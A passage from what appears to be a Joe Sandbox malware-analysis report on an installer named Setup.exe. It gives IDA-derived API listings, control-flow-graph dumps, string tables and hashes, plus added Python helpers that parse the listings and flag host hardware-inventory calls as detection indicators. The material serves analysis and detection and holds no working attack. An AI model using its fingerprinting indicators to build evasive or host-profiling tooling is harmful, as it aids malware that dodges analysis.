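    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
# Composite rights named as a whole when the mask matches exactly.
_KEY_COMPOSITE = [(0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"), (0xF003F, "KEY_ALL_ACCESS")]
_KEY_BITS = [
    (0x00001, "KEY_QUERY_VALUE"), (0x00002, "KEY_SET_VALUE"),
    (0x00004, "KEY_CREATE_SUB_KEY"), (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00010, "KEY_NOTIFY"), (0x00020, "KEY_CREATE_LINK"),
    (0x00100, "KEY_WOW64_64KEY"), (0x00200, "KEY_WOW64_32KEY"),
    (0x10000, "DELETE"), (0x20000, "READ_CONTROL"),
    (0x40000, "WRITE_DAC"), (0x80000, "WRITE_OWNER"),
]


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple                 # argument tokens as printed; "?" means not recovered
    ref: int                    # call-site address
    subcall_of: Optional[int]   # enclosing function when the line is a subcall entry


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; returns None for lines that do not match the shape."""
    m = _API_RE.match(line)
    if m is None:
        return None
    raw = m.group("args")
    # String arguments containing commas would be split too; fine for this listing.
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    sub = m.group("sub")
    return ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                   ref=int(m.group("ref"), 16), subcall_of=int(sub, 16) if sub else None)


def parse_api_listing(lines) -> list:
    return [c for c in (parse_api_line(ln) for ln in lines) if c is not None]


def decode_access_mask(mask: int) -> str:
    for value, name in _KEY_COMPOSITE:
        if mask == value:
            return name
    names = [name for bit, name in _KEY_BITS if mask & bit]
    return "|".join(names) if names else f"0x{mask:X}"


def _hex_arg(tok: str) -> Optional[int]:
    """Numeric arguments are printed as bare hex (e.g. 80000002); '?' is unknown."""
    try:
        return int(tok, 16)
    except ValueError:
        return None


def decode_reg_open(call: ApiCall) -> Optional[dict]:
    """RegOpenKeyEx(hKey, lpSubKey, ulOptions, samDesired, phkResult): name hive and rights."""
    if call.api not in ("RegOpenKeyExW", "RegOpenKeyExA") or len(call.args) < 4:
        return None
    hive, sam = _hex_arg(call.args[0]), _hex_arg(call.args[3])
    return {"hive": _HIVES.get(hive, call.args[0]), "subkey": call.args[1],
            "access": decode_access_mask(sam) if sam is not None else call.args[3]}


def hardware_inventory_indicators(calls) -> list:
    """Flag the registry/memory/system-info calls that size the host, in listing order."""
    findings = []
    for c in calls:
        reg = decode_reg_open(c)
        if reg and reg["hive"] == "HKEY_LOCAL_MACHINE" and \
                reg["subkey"].upper().startswith("HARDWARE\\DESCRIPTION\\"):
            findings.append(f"{c.ref:08X}: opens {reg['hive']}\\{reg['subkey']} ({reg['access']})")
        elif c.api in ("RegQueryValueExW", "RegQueryValueExA") and len(c.args) > 1 and c.args[1] != "?":
            findings.append(f"{c.ref:08X}: reads registry value '{c.args[1]}'")
        elif c.api == "GlobalMemoryStatusEx":
            findings.append(f"{c.ref:08X}: queries physical/virtual memory size")
        elif c.api == "GetProcAddress" and len(c.args) > 1:
            findings.append(f"{c.ref:08X}: resolves {c.args[1]} at run time")
    return findings


if __name__ == "__main__":
    for line in hardware_inventory_indicators(parse_api_listing(SAMPLE_API_LINES)):
        print(line)
```

Run against the embedded lines it reports the run-time resolution of GetNativeSystemInfo, the KEY_READ open of the CentralProcessor\0 key, the ~MHz and ~Mhz reads and the GlobalMemoryStatusEx call. The three casings are worth noting when writing a detection: on a real host the value is spelled ~MHz, so the ~Mhz and ~mhz fallbacks only fire when the first query fails.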

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBD025
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,69D661FC,graphics,?,00000054,69DBB48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 69DBD0BE
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DBD16E
                                                                                                                                                                      • Part of subcall function 69DA8F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,69D75DB8,69DAF845,00000010,?,69DA831D,00000000), ref: 69DA8F84
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                                                                                                                                    • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                                                                                                                                    • API String ID: 419085990-1965610755
                                                                                                                                                                    • Opcode ID: d055725c239bea74752aaea5b26e0395d750ac9722f288a36424d5cc48ad0755
                                                                                                                                                                    • Instruction ID: 0fc9655b2428e895162bb34f58e5b5bccdb01b6ee48d0b45e428a74bef18bae1
                                                                                                                                                                    • Opcode Fuzzy Hash: d055725c239bea74752aaea5b26e0395d750ac9722f288a36424d5cc48ad0755
                                                                                                                                                                    • Instruction Fuzzy Hash: FA4100B5C00259EBCB00DFE4D945BDEBBB9BF19304F908539E414BBA60C7359A098BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

Control-flow graph for the function at 69d8a82c-69d8af89 (graph image not reproduced): a long straight chain of internal calls (69da833e, 69dc8f0e, 69d78d44, 69d79703 and others) with a single __CxxThrowException@8 site in block 69d8ad14-69d8ad1d, reached from 69d8acbe and 69d8adce; the function exits through 69d8af82-69d8af89.
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8A833
                                                                                                                                                                      • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8AD1D
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                                                                                                                                    • API String ID: 2489616738-1903366528
                                                                                                                                                                    • Opcode ID: f87e1dc73f48f1c34f6a8dca27f7fe3f63541bbfc58bb98e4b636ab5a38ec437
                                                                                                                                                                    • Instruction ID: 187d32d8f8fa3392501f59bb3b5f72a39c4ae4e1452828f898575e5dc51623c2
                                                                                                                                                                    • Opcode Fuzzy Hash: f87e1dc73f48f1c34f6a8dca27f7fe3f63541bbfc58bb98e4b636ab5a38ec437
                                                                                                                                                                    • Instruction Fuzzy Hash: 91422C75A04249EFDB04DFA8C944A9EBBB8BF09314F048569F825EB781C734EA15CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1454 69d92582-69d925bb call 69dd6e1a call 69d78996 call 69da85bc 1461 69d925bd-69d925d1 call 69dcc0aa 1454->1461 1462 69d92635-69d92645 call 69da85bc 1454->1462 1467 69d9260f 1461->1467 1468 69d925d3-69d925fd call 69da833e 1461->1468 1469 69d92688-69d92698 call 69da85bc 1462->1469 1470 69d92647-69d9265b call 69dcc0aa 1462->1470 1471 69d92611-69d9261f 1467->1471 1480 69d925ff-69d92601 1468->1480 1481 69d92605-69d92608 call 69d8a82c 1468->1481 1485 69d926da-69d926ea call 69da85bc 1469->1485 1486 69d9269a-69d926ae call 69dcc0aa 1469->1486 1482 69d928bd 1470->1482 1483 69d92661-69d92671 1470->1483 1475 69d92625-69d92630 call 69dc8f0e 1471->1475 1476 69d928c6-69d928f1 call 69da833e call 69dd68b5 1471->1476 1475->1476 1506 69d92938-69d9297b call 69da8cd5 call 69da8c7a call 69da8c24 1476->1506 1507 69d928f3-69d92936 call 69d86cb7 call 69dc8eab call 69da84b9 call 69dc8f0e * 2 1476->1507 1480->1481 1497 69d9260d 1481->1497 1494 69d928bf-69d928c3 1482->1494 1488 69d92679-69d92683 call 69d8f05d 1483->1488 1489 69d92673-69d92675 1483->1489 1503 69d9272b-69d9273b call 69da85bc 1485->1503 1504 69d926ec-69d92700 call 69dcc0aa 1485->1504 1486->1482 1505 69d926b4-69d926c5 1486->1505 1488->1494 1489->1488 1494->1476 1497->1471 1518 69d9277d-69d9278d call 69da85bc 1503->1518 1519 69d9273d-69d92751 call 69dcc0aa 1503->1519 1504->1482 1521 69d92706-69d92716 1504->1521 1509 69d926cd-69d926d5 call 69d8b69b 1505->1509 1510 69d926c7-69d926c9 1505->1510 1551 69d92980-69d929c0 call 69dc8f0e * 5 1506->1551 1507->1506 1509->1494 1510->1509 1538 69d9278f-69d927a3 call 69dcc0aa 1518->1538 1539 69d927d0-69d927e0 call 69da85bc 1518->1539 1519->1482 1535 69d92757-69d92768 1519->1535 1525 69d92718-69d9271a 1521->1525 1526 69d9271e-69d92721 call 69d8d8a6 1521->1526 1525->1526 1537 69d92726 1526->1537 1541 
69d9276a-69d9276c 1535->1541 1542 69d92770-69d92778 call 69d8c922 1535->1542 1537->1494 1538->1482 1550 69d927a9-69d927b9 1538->1550 1554 69d92823-69d92833 call 69da85bc 1539->1554 1555 69d927e2-69d927f6 call 69dcc0aa 1539->1555 1541->1542 1542->1494 1556 69d927bb-69d927bd 1550->1556 1557 69d927c1-69d927c6 call 69d8e30e 1550->1557 1604 69d929c8-69d929d0 call 69dd6f06 1551->1604 1605 69d929c2-69d929c4 1551->1605 1568 69d9286e-69d9287e call 69da85bc 1554->1568 1569 69d92835-69d92849 call 69dcc0aa 1554->1569 1555->1482 1571 69d927fc-69d9280c 1555->1571 1556->1557 1567 69d927cb 1557->1567 1567->1494 1582 69d929d3-69d92ad5 call 69da8cd5 call 69da8c7a call 69dc8f0e * 2 call 69da833e call 69da8cd5 call 69d7838a call 69dc8f0e * 2 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa call 69d8632c 1568->1582 1583 69d92884-69d92898 call 69dcc0aa 1568->1583 1569->1482 1584 69d9284b-69d9285c 1569->1584 1574 69d9280e-69d92810 1571->1574 1575 69d92814-69d92819 call 69d8facf 1571->1575 1574->1575 1581 69d9281e 1575->1581 1581->1494 1635 69d92ade-69d92ae2 1582->1635 1636 69d92ad7-69d92add call 69dcb081 1582->1636 1583->1482 1595 69d9289a-69d928ab 1583->1595 1588 69d9285e-69d92860 1584->1588 1589 69d92864-69d9286c call 69d902c6 1584->1589 1588->1589 1589->1494 1599 69d928ad-69d928af 1595->1599 1600 69d928b3-69d928b6 call 69d91287 1595->1600 1599->1600 1607 69d928bb 1600->1607 1605->1604 1607->1494 1636->1635
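The control_flow_graph dump above is the Joe Sandbox IDA plugin's textual form of the graph image: each basic block appears as a numeric node id, its address (or address range), zero or more `call <target>` entries (with `* N` when the same target is called N times in a row), and the `src->dst` edges are interleaved with the block definitions. Read as one run-on line it is nearly useless; parsed, it answers questions like "which blocks in this function reach the allocating/throwing helper 69dcc0aa". The following parser is an added example, not Joe Sandbox code or the report's own output. Its token grammar is inferred from the dump on this page and is an assumption about the format, not a documented one; in particular it assumes node ids are always shorter than eight digits so they never look like an 8-hex-digit address. Because it tokenises with a regex and ignores whitespace between tokens, incidental line breaks in an exported report do not affect the result.

```python
"""Parse a Joe Sandbox 'control_flow_graph' text dump into nodes and edges.

Added example. The grammar below is inferred from the dump in this report
and is an assumption about the format, not a documented Joe Sandbox spec.
"""
import re
from dataclasses import dataclass, field

# Alternation order matters: an edge ("1454->1461") must win over a bare node
# id, and an 8-hex-digit address or range over a short decimal node id.
# Assumption: node ids are shorter than 8 digits, so they never match <addr>.
_TOKEN = re.compile(
    r"(?P<edge>\b\d+->\d+\b)"
    r"|(?P<mult>\*\s*\d+)"
    r"|(?P<call>\bcall\b)"
    r"|(?P<addr>\b[0-9a-f]{8}(?:-[0-9a-f]{8})?\b)"
    r"|(?P<node>\b\d+\b)"
)

# Excerpt copied from the first control_flow_graph dump on this page
# (function starting at 69d92582); truncated, so edge 1476->1507 refers to a
# block that is not defined in the excerpt.
SAMPLE = (
    "control_flow_graph 1454 69d92582-69d925bb call 69dd6e1a call 69d78996 call 69da85bc "
    "1461 69d925bd-69d925d1 call 69dcc0aa 1454->1461 1462 69d92635-69d92645 call 69da85bc 1454->1462 "
    "1467 69d9260f 1461->1467 1468 69d925d3-69d925fd call 69da833e 1461->1468 "
    "1507 69d928f3-69d92936 call 69d86cb7 call 69dc8eab call 69da84b9 call 69dc8f0e * 2 1476->1507"
)


@dataclass
class Cfg:
    nodes: dict = field(default_factory=dict)  # node id -> (address range, [call targets])
    edges: list = field(default_factory=list)  # (src node id, dst node id) in dump order


def parse_cfg(text: str) -> Cfg:
    """Parse one control_flow_graph dump. Unexplained input raises ValueError
    instead of being silently dropped, so a format change is noticed."""
    body = re.sub(r"^\s*control_flow_graph\s*", "", text.strip())
    g = Cfg()
    cur = None          # id of the block currently being defined
    after_call = False  # the next address is a call target, not the block range
    for m in _TOKEN.finditer(body):
        kind, tok = m.lastgroup, m.group()
        if kind == "edge":
            src, dst = tok.split("->")
            g.edges.append((int(src), int(dst)))
        elif kind == "node":
            cur = int(tok)
            g.nodes[cur] = ("", [])
        elif kind == "call":
            after_call = True
        elif kind == "addr":
            if cur is None:
                raise ValueError(f"address {tok} before any node id")
            rng, calls = g.nodes[cur]
            if after_call:
                calls.append(tok)
                after_call = False
            elif rng == "":
                g.nodes[cur] = (tok, calls)
            else:
                raise ValueError(f"second range {tok} for node {cur}")
        elif kind == "mult":
            # "call X * N": the block calls X N times in a row
            calls = g.nodes[cur][1]
            if not calls:
                raise ValueError(f"multiplicity {tok} without a preceding call")
            n = int(tok.lstrip("*").strip())
            calls.extend([calls[-1]] * (n - 1))
    return g


def blocks_calling(g: Cfg, target: str) -> list:
    """Node ids of blocks that call `target` (lower-case hex), in dump order."""
    return [nid for nid, (_, calls) in g.nodes.items() if target in calls]


def successors(g: Cfg, nid: int) -> list:
    """Direct successor node ids of `nid`, in dump order."""
    return [dst for src, dst in g.edges if src == nid]


if __name__ == "__main__":
    g = parse_cfg(SAMPLE)
    print(f"{len(g.nodes)} blocks, {len(g.edges)} edges")
    print("blocks calling 69dcc0aa:", blocks_calling(g, "69dcc0aa"))
    for nid, (rng, calls) in g.nodes.items():
        print(nid, rng, calls, "->", successors(g, nid))
```

Run it against the full dump above (paste it into `SAMPLE`, or read it from a file) to list every block that reaches 69dcc0aa, which the next function entry's API list identifies as a subcall that goes on to _malloc and __CxxThrowException@8.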
APIs
• __EH_prolog3.LIBCMT ref: 69D92589
  • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• __CxxThrowException@8.LIBCMT ref: 69D92AB0
  • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC0F9
  • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC113
  • Part of subcall function 69DCC0AA: __CxxThrowException@8.LIBCMT ref: 69DCC124
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
• String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
• API String ID: 3439882596-1328758535
• Opcode ID: bc2f7695ab9aac44441fe5acc77e0197c8467f99a027359b4d9bde2c009e3e26
• Instruction ID: a9a59c67e434244cc56898e187171b514420a9fa154c0b68ae29caf070675290
• Opcode Fuzzy Hash: bc2f7695ab9aac44441fe5acc77e0197c8467f99a027359b4d9bde2c009e3e26
• Instruction Fuzzy Hash: AB026B75904248EFDF00EBA8CD44AED7BB8BF19318F108179E515E7A81DB349A458BB2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 698DBE0A
  • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
  • Part of subcall function 698EF35E: __EH_prolog3.LIBCMT ref: 698EF365
  • Part of subcall function 698EF35E: __recalloc.LIBCMT ref: 698EF3A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: H_prolog3$__recalloc
• String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
• API String ID: 1900422986-634121796
• Opcode ID: eccd54274b3a41c96392ef46771ed883ebf02105b6715a8f1c25fd55c71f776a
• Instruction ID: f4e822a694f000e7035c8106441754590dbd9031f7b593e0a74591fcaaee3d81
• Opcode Fuzzy Hash: eccd54274b3a41c96392ef46771ed883ebf02105b6715a8f1c25fd55c71f776a
• Instruction Fuzzy Hash: 70A12AB580026D9EDF01D7ECC8807EDB7B4AF2631CF589D8DE024A3292D7759A499732
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3.LIBCMT ref: 69D73E7E
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69DA9067: __EH_prolog3.LIBCMT ref: 69DA906E
  • Part of subcall function 69DA9067: __recalloc.LIBCMT ref: 69DA90B0
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$__recalloc
• String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
• API String ID: 1900422986-634121796
• Opcode ID: 10e5c15fe0d1945d16d6c8f61a1301717189359bc201cf1338beb0aa104e737e
• Instruction ID: 34e285db2b89c4f4219bcf6b0adfe3bb504e936d9e55ef2790fda202b047460b
• Opcode Fuzzy Hash: 10e5c15fe0d1945d16d6c8f61a1301717189359bc201cf1338beb0aa104e737e
• Instruction Fuzzy Hash: A391F9394042CCEADB00DFB8C544BCCBBA9AF1136CF54D164E8649BA81D7B5D7289736
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1872 69d8148d-69d81502 call 69d7ac58 call 69da85bc 1878 69d81508-69d8151d call 69dcc0aa 1872->1878 1879 69d8158e-69d815a1 call 69da85bc 1872->1879 1884 69d8151f-69d8153b call 69da833e call 69d80e96 1878->1884 1885 69d81554 1878->1885 1886 69d8160b-69d8161c call 69da85bc 1879->1886 1887 69d815a3-69d815b8 call 69dcc0aa 1879->1887 1908 69d81540-69d81552 call 69dc8f0e 1884->1908 1888 69d81556-69d81561 1885->1888 1901 69d8161e-69d81631 call 69dcc0aa 1886->1901 1902 69d81661-69d81674 call 69da85bc 1886->1902 1899 69d815ba-69d815d6 call 69da833e call 69d80e96 1887->1899 1900 69d815ef 1887->1900 1892 69d81569 1888->1892 1893 69d81563-69d81565 1888->1893 1897 69d8156b-69d8158b call 69dc8f0e 1892->1897 1893->1892 1922 69d815db-69d815ed call 69dc8f0e 1899->1922 1905 69d815f1-69d815fc 1900->1905 1916 69d81643 1901->1916 1917 69d81633-69d8163a call 69d811f6 1901->1917 1920 69d816c9-69d816dc call 69da85bc 1902->1920 1921 69d81676-69d8168b call 69dcc0aa 1902->1921 1912 69d815fe-69d81600 1905->1912 1913 69d81604-69d81606 1905->1913 1908->1888 1912->1913 1913->1897 1924 69d81645-69d81650 1916->1924 1927 69d8163f-69d81641 1917->1927 1933 69d816de-69d816f3 call 69dcc0aa 1920->1933 1934 69d81731-69d81744 call 69da85bc 1920->1934 1921->1900 1935 69d81691-69d816c4 call 69da833e call 69d800a7 call 69dc8f0e 1921->1935 1922->1905 1924->1897 1929 69d81656-69d8165c 1924->1929 1927->1924 1929->1897 1933->1900 1946 69d816f9-69d8172c call 69da833e call 69d800a7 call 69dc8f0e 1933->1946 1944 69d81799-69d817ac call 69da85bc 1934->1944 1945 69d81746-69d8175b call 69dcc0aa 1934->1945 1935->1905 1955 69d817ae-69d817c3 call 69dcc0aa 1944->1955 1956 69d81801-69d81814 call 69da85bc 1944->1956 1945->1900 1958 69d81761-69d81794 call 69da833e call 69d800a7 call 69dc8f0e 1945->1958 1946->1905 1955->1900 1971 69d817c9-69d817fc 
call 69da833e call 69d800a7 call 69dc8f0e 1955->1971 1968 69d81869-69d8187a call 69da85bc 1956->1968 1969 69d81816-69d8182b call 69dcc0aa 1956->1969 1958->1905 1983 69d8187c-69d8187e call 69dcc0aa 1968->1983 1984 69d818a6-69d818b7 call 69da85bc 1968->1984 1969->1900 1981 69d81831-69d81864 call 69da833e call 69d800a7 call 69dc8f0e 1969->1981 1971->1905 1981->1905 1993 69d81883-69d8188f 1983->1993 1995 69d818b9-69d818c3 call 69dcc0aa 1984->1995 1996 69d818d7-69d818e8 call 69da85bc 1984->1996 1993->1916 1994 69d81895-69d818a1 call 69d80baa 1993->1994 1994->1984 1995->1916 2010 69d818c9 1995->2010 2007 69d818ea-69d818f4 call 69dcc0aa 1996->2007 2008 69d81902-69d819d7 call 69da833e call 69da8cd5 call 69d7838a call 69dc8f0e * 2 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa call 69dd6e1a call 69d78b9f call 69d8148d 1996->2008 2007->1916 2016 69d818fa-69d81900 2007->2016 2040 69d819dc-69d819e8 2008->2040 2013 69d818cf 2010->2013 2013->1996 2016->2013 2041 69d819ea-69d819ec 2040->2041 2042 69d819f0-69d81a19 call 69dc8eab 2040->2042 2041->2042 2045 69d81a1b-69d81a1d 2042->2045 2046 69d81a21-69d81a29 call 69d7922c 2042->2046 2045->2046 2049 69d81a2f-69d81ade call 69da833e call 69da8cd5 call 69da8c7a call 69d7838a call 69dc8f0e * 3 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa 2046->2049 2050 69d81ae3-69d81aea call 69dd6f06 2046->2050 2049->2050
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8FreeStringThrow_malloc
• String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
• API String ID: 1924927865-100526994
• Opcode ID: d206ee95d3655047bbca23b62318d71d8bc2d4d33e4c176972ca019da53ffd01
• Instruction ID: 3670cca19e22b77340129c00bb83a383e697308bc03857ddbfbe785ca3cd2335
• Opcode Fuzzy Hash: d206ee95d3655047bbca23b62318d71d8bc2d4d33e4c176972ca019da53ffd01
• Instruction Fuzzy Hash: 54028D75108381DBD700CFA8C980B9EBBECAF95358F108939F595D7A92DB70D9088B72
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered control-flow graph omitted: function 69d8facf, basic blocks 69d8facf through 69d90068; internal callees 69dd6e1a, 69da833e, 69d7a1ff, 69dc8f0e, 69d78d44, 69d81c2e, 69d81d3d, 69d8784c, 69d79411, 69d83ba9, 69d86d1f, 69d897ce, 69d795c1, 69d8f8cd, 69d790aa, 69d7838a, 69d7a378, 69dd14aa, 69d7917e, 69dd6f06. Nodes were marked Executed / Not Executed in the original rendering.]
APIs
• __EH_prolog3.LIBCMT ref: 69D8FAD6
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
